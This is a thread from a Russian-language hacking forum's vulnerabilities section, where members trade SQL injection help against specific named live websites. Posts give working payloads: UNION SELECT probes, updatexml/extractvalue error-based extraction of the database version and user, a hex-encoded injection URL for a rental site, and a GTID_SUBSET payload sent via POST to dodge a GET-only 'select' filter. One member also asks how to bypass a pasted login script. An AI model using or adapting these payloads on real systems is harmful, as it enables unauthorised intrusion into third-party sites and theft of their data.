HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2301  
Старый 23.04.2018, 17:10
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от Muracha  

Спасибо, почему на конце
-- 1
? А не -- или /*
Потому что советую коментарий ставить, а после него ещё символ любой, Заметь, многие делают +--+-

Цитата:
Сообщение от BabaDook  

Помогите пожалуйста, никак не могу сделать это
Код:
http://www.alphaonenow.org/story.php?news_id=2 UnIoN  select 1,2,3+--+-
Никак не могу получить вывод.
Эх, никто таки сделал.Вопрос закрыт
 
Ответить с цитированием

  #2302  
Старый 23.04.2018, 17:31
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами: 5025206

Репутация: 5
По умолчанию

Цитата:
Сообщение от BabaDook  

Потому что советую коментарий ставить, а после него ещё символ любой, Заметь, многие делают +--+-
Эх, никто таки сделал.Вопрос закрыт
http://www.alphaonenow.org/searchresults.php

В поиске 'and updatexml(NULL,concat(0x0a,(SELECT 1)),Null)--'
 
Ответить с цитированием

  #2303  
Старый 23.04.2018, 17:37
Alaich
Новичок
Регистрация: 16.10.2015
Сообщений: 21
С нами: 5566646

Репутация: 7
По умолчанию

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]window.location.href='home.php';"[/COLOR][COLOR="#007700"];
}
else
{
[/
COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Invalid Username or password !"[/COLOR][COLOR="#007700"];
}

}

[/COLOR][COLOR="#FF8000"]/*-------------------------End of login----------------------------------------------------*/
[/COLOR][COLOR="#0000BB"]?>
[/COLOR]



[COLOR="#0000BB"][/COLOR]



User Name
[/COLOR]" class="textbox" style="width:150px"/>



Password
[/COLOR]" class="textboxpwd" style="width:150px"/>



 




[/COLOR] 
Есть возможность обойти ?
 
Ответить с цитированием

  #2304  
Старый 23.04.2018, 17:56
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
С нами: 5745206

Репутация: 1
По умолчанию

Цитата:
Сообщение от BabaDook  

Помогите пожалуйста, никак не могу сделать это
Код:
http://www.alphaonenow.org/story.php?news_id=2 UnIoN  select 1,2,3+--+-
Никак не могу получить вывод.
загугли sql injection
 
Ответить с цитированием

  #2305  
Старый 25.04.2018, 19:07
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Помогите пожалуйста:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]0x676a72656e74616c732e636f6d2f72656e74616c5f64657461696c732e7068703f69643d33392b554e694f6e2b53654c4563542b312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392c32302c32312c32322c32332c32342c32352c3236[/COLOR][/COLOR
 
Ответить с цитированием

  #2306  
Старый 25.04.2018, 20:52
Jerri
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
С нами: 8859263

Репутация: 334
По умолчанию

Цитата:
Сообщение от BabaDook  

Помогите пожалуйста:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]0x676a72656e74616c732e636f6d2f72656e74616c5f64657461696c732e7068703f69643d33392b554e694f6e2b53654c4563542b312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392c32302c32312c32322c32332c32342c32352c3236[/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]0x687474703a2f2f676a72656e74616c732e636f6d2f72656e74616c5f64657461696c732e7068703f69643d312b414e442b4558545241435456414c55452832322c434f4e43415428307835632c2876657273696f6e28292929292b2d2d2b2d[/COLOR][/COLOR
 
Ответить с цитированием

  #2307  
Старый 25.04.2018, 20:55
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от Jerri  

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]0x687474703a2f2f676a72656e74616c732e636f6d2f72656e74616c5f64657461696c732e7068703f69643d312b414e442b4558545241435456414c55452832322c434f4e43415428307835632c2876657273696f6e28292929292b2d2d2b2d[/COLOR][/COLOR
Спасибо братан
 
Ответить с цитированием

  #2308  
Старый 26.04.2018, 03:00
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Цитата:
Сообщение от BabaDook  

Помогите пожалуйста, никак не могу сделать это
Код:
http://www.alphaonenow.org/story.php?news_id=2 UnIoN  select 1,2,3+--+-
Никак не могу получить вывод.
Отправляй через POST. Там видимо $_REQUEST['news_id'].

Код:
http://www.alphaonenow.org/story.php
POST: news_id = 4341 and GTID_SUBSET((SELECT database()),0)-- a
Слово "select" хорошо фильтруется, но жаль, что фильтр работает только на GET-параметрах.
 
Ответить с цитированием

  #2309  
Старый 26.04.2018, 06:27
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

/threads/21336/page-716#post-2897553

Как такие запросы дедектить, методом тыка? Встречал всего 3-5 ресурсов, но скорее у меня был тупо метод тыка.
 
Ответить с цитированием

  #2310  
Старый 26.04.2018, 11:51
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,123
С нами: 5738006

Репутация: 147


По умолчанию

Цитата:
Сообщение от man474019  

http://www.alphaonenow.org/searchresults.php
'and updatexml(NULL,concat(0x0a,(SELECT user())),Null)--'
/threads/424557/page-117#post-4204250
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.